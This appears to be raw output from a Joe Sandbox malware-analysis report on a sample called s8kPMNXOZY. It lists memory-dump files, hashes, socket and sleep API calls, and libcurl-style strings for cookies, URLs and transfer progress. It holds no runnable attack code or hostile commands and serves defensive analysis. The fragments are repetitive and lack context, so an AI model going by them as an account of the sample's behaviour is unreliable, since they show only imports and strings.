                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: Startup
                                                          • String ID: if_nametoindex$iphlpapi.dll
                                                          • API String ID: 724789610-3097795196
                                                          • Opcode ID: cc59e053dbb885d874c625cc7eb746edd6687590a2ae7f7f2e8373b4d0988796
                                                          • Instruction ID: 379fbe4ad6e9f1fb0ad475fa2c0bb1cfa8f125e4764aa3f38e4d3881569694bf
                                                          • Opcode Fuzzy Hash: cc59e053dbb885d874c625cc7eb746edd6687590a2ae7f7f2e8373b4d0988796
                                                          • Instruction Fuzzy Hash: FA019EE0E6434206F720BF38BD2B76536E85B91305F84542CEC88A11C2F73CC6ADC192
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
• Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmp
Similarity
• API ID: closesocket
• String ID: FD %s:%d sclose(%d)
• API String ID: 2781271927-3116021458
• Opcode ID: 6a909cd560d30f165c903a0c5d2eeeba5234588e8ac33b588785f49360a807f8
• Instruction ID: 1cc05c0cd2561777138fda171261aeed770f998c9c08ec381ec401ea8c027a1b
• Opcode Fuzzy Hash: 6a909cd560d30f165c903a0c5d2eeeba5234588e8ac33b588785f49360a807f8
• Instruction Fuzzy Hash: 10D0A733A192317B8530A9997C4DC8B7BA8DDCAF60F064D68FD5077204D2309C1487F2
APIs
• connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0030B29E,?,00000000,?,?), ref: 0030B0BA
• WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,002F3C41,00000000), ref: 0030B0C1
Similarity
• API ID: ErrorLastconnect
• String ID:
• API String ID: 374722065-0
• Opcode ID: 04b931688dc58349dbfa0651e99e2b0cd49d9df7d6bbba63e597488ef314eb4e
• Instruction ID: dede559de5e59564ad169a2fc8c0bb454e248178e9f463c22f919d9a241c6245
• Opcode Fuzzy Hash: 04b931688dc58349dbfa0651e99e2b0cd49d9df7d6bbba63e597488ef314eb4e
• Instruction Fuzzy Hash: E70124363052019BCA215A688C94FABF399FF88364F050B24F978A31E0D726ED008752
APIs
• getsockname.WS2_32(?,?,00000080), ref: 0030AFD0
Similarity
• API ID: getsockname
• String ID:
• API String ID: 3358416759-0
• Opcode ID: f9f6cc50f7dcea4c54e711e32aff7e44b074823186ed4292f8f403acc902277b
• Instruction ID: 5c61e4d57c20eb097b8dd0c59fbad6f4231322e9966e1361ee77da8dcc90bfd0
• Opcode Fuzzy Hash: f9f6cc50f7dcea4c54e711e32aff7e44b074823186ed4292f8f403acc902277b
• Instruction Fuzzy Hash: 6C116670808B8596EB268F1CD8027E6F3F4EFD0329F109619E59942550F7765AC58BC2
APIs
• send.WS2_32(?,?,?,00000000,00000000,?), ref: 0030A97E
Similarity
• API ID: send
• String ID:
• API String ID: 2809346765-0
• Opcode ID: 7db9cf14b27fe35bd6a7d68674a31f011f61c8627ba80377e2801c8ed90e2847
• Instruction ID: c7cc477edc55dcef8f9bf679ab06820d205e2c5e804a426edd4859ec728089e9
• Opcode Fuzzy Hash: 7db9cf14b27fe35bd6a7d68674a31f011f61c8627ba80377e2801c8ed90e2847
• Instruction Fuzzy Hash: 7601A272B01B14AFC6148F25EC45B5AB7A5EF84720F068669EA982B3A1C331AC118BD1
APIs
• socket.WS2_32(?,0030B280,00000000,-00000001,00000000,0030B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0030AF66
Similarity
• API ID: socket
• String ID:
• API String ID: 98920635-0
• Opcode ID: 2958674f9247e3c44d6402256cc3db90ba83d040a8b66e8bb53562cfb076c809
• Instruction ID: ee7dd63f300eb75f58c2aba26bc766dde0ba34c366bcd24e0a004947d8f36872
• Opcode Fuzzy Hash: 2958674f9247e3c44d6402256cc3db90ba83d040a8b66e8bb53562cfb076c809
• Instruction Fuzzy Hash: BCE0EDB2A057216BD6659A58FC449ABF3A9EFC4B20F054A49BC5467204C330AC508BE2
APIs
• closesocket.WS2_32(?,00309422,?,?,?,?,?,?,?,?,?,?,?,w3/,006D4C60,00000000), ref: 0030B04D
Similarity
• API ID: closesocket
• String ID:
• API String ID: 2781271927-0
• Opcode ID: 476e2a87d33834955740efa88cf7ccd9d6ef6569ef76b95c32d92b4c577729b8
• Instruction ID: cb1c46bb5694e27afb791c62f0e701c6fd85b7c7648af4782acb411ebf655102
• Opcode Fuzzy Hash: 476e2a87d33834955740efa88cf7ccd9d6ef6569ef76b95c32d92b4c577729b8
• Instruction Fuzzy Hash: BCD0C27430020157CA208A14C894A57B22B7FC0310FAACB68E02C4A590C73BCC438601
APIs
• ioctlsocket.WS2_32(?,8004667E,?,?,0027AF56,?,00000001), ref: 002A67FC
Similarity
• API ID: ioctlsocket
• String ID:
• API String ID: 3577187118-0
• Opcode ID: 97e72dbe4c8bba161a0438c6d78b419a9235ef456c2a600e5fdabbc3e30146b0
• Instruction ID: 51c6bd8fe0380b492677a0af7bca241a7374fac25c3ee312101794ca8da7ecb7
• Opcode Fuzzy Hash: 97e72dbe4c8bba161a0438c6d78b419a9235ef456c2a600e5fdabbc3e30146b0
• Instruction Fuzzy Hash: 26C012F1118101EFC60C8714D895A6F76D9DB85355F01582CB04681180EA305990CA16
APIs
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 0ba154512fa4093483453a8bba26f2778cd668aa9c6b0149b94dd5d2c996a95a
• Instruction ID: fb0fbea663d081c227d723c1eef78308f4e778891c691bf2296eded299d54d93
• Opcode Fuzzy Hash: 0ba154512fa4093483453a8bba26f2778cd668aa9c6b0149b94dd5d2c996a95a
• Instruction Fuzzy Hash: 773194B49093059FCB40EFB8C5896AEBBF4FF44344F00896DE899A7241E7749A44DF92
APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 4cc48e05577b1c3649a54e7d6167a891443e5c9784d9b0a227baff333d540fc5
                                                          • Instruction ID: ffb8aeb65a2d2092ef532b836fe8edc59f314cd359d22193c2bf5fa25b874b62
                                                          • Opcode Fuzzy Hash: 4cc48e05577b1c3649a54e7d6167a891443e5c9784d9b0a227baff333d540fc5
                                                          • Instruction Fuzzy Hash: 99C08CA0D0034442D740BA38854611D79E43740104FC01B68988496080F72883288263
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #HttpOnly_$%s cookie %s="%s" for domain %s, path %s, expire %lld$;=$;$=$Added$FALSE$Replaced$TRUE$__Host-$__Secure-$cookie '%s' dropped, domain '%s' must not set cookies for '%s'$cookie '%s' for domain '%s' dropped, would overlay an existing cookie$cookie contains TAB, dropping$cookie.c$domain$expires$httponly$invalid octets in name/value, cookie dropped$libpsl problem, rejecting cookie for satety$max-age$oversized cookie dropped, name/val %zu + %zu bytes$path$secure$skipped cookie with bad tailmatch domain: %s$version
                                                          • API String ID: 0-1371176463
                                                          • Opcode ID: ddd3114a7598351b7aa0eda12f203ac2bda53aadb6fdd675d26a6aaac7896051
                                                          • Instruction ID: 9cebdb3602271cd7465884180b0bd5683049814ce2a59c691e40ebb0a86d43bb
                                                          • Opcode Fuzzy Hash: ddd3114a7598351b7aa0eda12f203ac2bda53aadb6fdd675d26a6aaac7896051
                                                          • Instruction Fuzzy Hash: 18B23A78A29302ABD724BF249C46B26BBD4AF54704F08492CFD89962C2F775DC38D752
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $d$nil)
                                                          • API String ID: 0-394766432
                                                          • Opcode ID: ed2b063b87d6b58611bc663710603e089ae71a3292e1dfa60fa78b7b69807b14
                                                          • Instruction ID: a310b6474e45fcc9fb9f9101224bfd44580c1772297188e6078367729909a884
                                                          • Opcode Fuzzy Hash: ed2b063b87d6b58611bc663710603e089ae71a3292e1dfa60fa78b7b69807b14
                                                          • Instruction Fuzzy Hash: 471336746083418FD720CF68C485B2ABBE2BFC9754F24492EE9959B3A1D771EC45CB82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$`W|$`W|$bW|$bW|$bW|$file$file://%s%s%s$https$urlapi.c$vW|$vW|$xn--
                                                          • API String ID: 0-3948613426
                                                          • Opcode ID: b84e0c9ed52632e9026ab0f3bd0e953153750dd09a49b98ca69dd2ec475ad022
                                                          • Instruction ID: c494fbec702083b8fec8a94e5dc56eb4464e893a4cb374d4b8a70a41abf8b6d7
                                                          • Opcode Fuzzy Hash: b84e0c9ed52632e9026ab0f3bd0e953153750dd09a49b98ca69dd2ec475ad022
                                                          • Instruction Fuzzy Hash: 45727C30628B529FE7318E28C4467A677D29F91744F48862CECC55B293EBB6DCE4C781
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %3lld %s %3lld %s %3lld %s %s %s %s %s %s %s$ %% Total %% Received %% Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed$%2lld:%02lld:%02lld$%3lldd %02lldh$%7lldd$** Resuming transfer from byte position %lld$--:-$--:-$--:-$-:--$-:--$-:--$Callback aborted
                                                          • API String ID: 0-122532811
                                                          • Opcode ID: bee718947a92b5197b90c2f36073de376488b9f1ceaa2c25990d37b3db4d8f33
                                                          • Instruction ID: e28f53185f1570a136dc4bccf59228f5f0f77a3f9d5ccbf588b17a6684ae7362
                                                          • Opcode Fuzzy Hash: bee718947a92b5197b90c2f36073de376488b9f1ceaa2c25990d37b3db4d8f33
                                                          • Instruction Fuzzy Hash: 8842F7B1B18701AFD708DE28CC51B6BF7EAEBC4704F04892CF94D97291E775A9148B92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ans$attempts$ndot$out$retr$retr$rota$time$use-$usev
                                                          • API String ID: 0-359024792
                                                          • Opcode ID: 1e363e7d12bc73c15b37323289656f317e9bc782d18871e141cfa43d58e0e32a
                                                          • Instruction ID: 0c73bf6ab8a9039ed75a34397828827754aa4a534d33fd6bad491276903f50a1
                                                          • Opcode Fuzzy Hash: 1e363e7d12bc73c15b37323289656f317e9bc782d18871e141cfa43d58e0e32a
                                                          • Instruction Fuzzy Hash: A8614DA5A1830967E715AA20EC53B3BF2C99B91388F04443CFD4A96293FE71DDA0C653
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_240000_s8kPMNXOZY.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld
                                                          • API String ID: 0-3476178709
                                                          • Opcode ID: 6a2bd19e5db36bfcfd2b3817276925c5156442fe9796b0f882e54d6599614575
                                                          • Instruction ID: 3ba176fa6267087419e40690e237a4a377a148d7e45a2f42a091cfb79bca95f8
                                                          • Opcode Fuzzy Hash: 6a2bd19e5db36bfcfd2b3817276925c5156442fe9796b0f882e54d6599614575
                                                          • Instruction Fuzzy Hash: AA31D7B3B35A5936F7280009DC56F3E115FC3C5B11E7A823DBD069B2C2D8F99D2842A9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1404794681.0000000000241000.00000040.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                          • Associated: 00000000.00000002.1404774647.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000917000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1404794681.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405264764.000000000091C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.000000000091E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000BC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405284370.0000000000CB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405701086.0000000000CBA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405827183.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1405859205.0000000000E79000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
